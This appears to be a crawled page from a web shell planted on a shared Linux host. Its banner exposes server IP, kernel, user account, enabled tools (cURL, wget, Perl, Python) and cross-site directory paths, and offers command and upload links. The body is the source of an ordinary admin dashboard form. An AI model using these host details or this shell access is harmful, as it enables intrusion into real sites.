Server IP : 103.53.40.154 / Your IP : 3.138.170.67 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/ppcad7no/jobskeyindia.com/../ntimachinery.com/webpanel/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <title>Dashboard</title> <link rel="stylesheet" href="bower_components/font-awesome/css/font-awesome.min.css"> <link rel="stylesheet" href="bower_components/Ionicons/css/ionicons.min.css"> <link rel="stylesheet" href="dist/css/AdminLTE.min.css"> <link rel="stylesheet" href="dist/css/skins/_all-skins.min.css"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script> <script src="dist/js/editor.js"></script> <script> $(document).ready(function() { $("#txtEditor").Editor(); }); </script> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css"> <link href="dist/css/editor.css" type="text/css" rel="stylesheet"/> </head> <body class="hold-transition skin-blue sidebar-mini"> <div class="wrapper"> <?php include('header.php') ?> <?php include('left-menu.php') ?> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <section class="content"> <div class="row"> <div class="col-md-12"> <div class="main-title"> <h3>Add SubCategory</h3> </div> </div> <div class="col-md-10 col-md-offset-1"> <div class="field-section"> <form> <div class="row"> <div class="col-md-6"> <lable class="input-text"> Select Category</lable> <div class="form-group"> <select class="from-control custom-type"> <option>--Select Category--</option> <option>Category1</option> <option>Category2</option> <option>Category3</option> <option>Category4</option> <option>Category5</option> </select> </div> </div> <div class="col-md-6"> <lable class="input-text"> Title</lable> <div class="form-group"> <input type="text" class="from-control custom-type"> </div> </div> <div class="col-md-6"> <lable class="input-text"> Meta Title</lable> <div class="form-group"> <input type="text" class="from-control custom-type"> </div> </div> <div class="col-md-6"> <lable class="input-text">Status</lable> <br> <label class="switch"> <input type="checkbox" checked> <span class="slider round"></span> </label> </div> <div class="col-md-12"> <lable class="input-text"> Meta Descriptions</lable> <textarea id="txtEditor"></textarea> <button type="submit" class="btn btn-submit">Add</button> </div> </div> </form> </div> </div> </div> </section> </div> <!-- /.content-wrapper --> <footer class="main-footer"> <strong>Copyright © 2014-2019 <a href="#">Dashboard</a>.</strong> All rights reserved. </footer> </div> <script src="bower_components/jquery-ui/jquery-ui.min.js"></script> <script> $.widget.bridge('uibutton', $.ui.button); </script> <script src="bower_components/bootstrap/dist/js/bootstrap.min.js"></script> <script src="dist/js/adminlte.min.js"></script> </body> </html>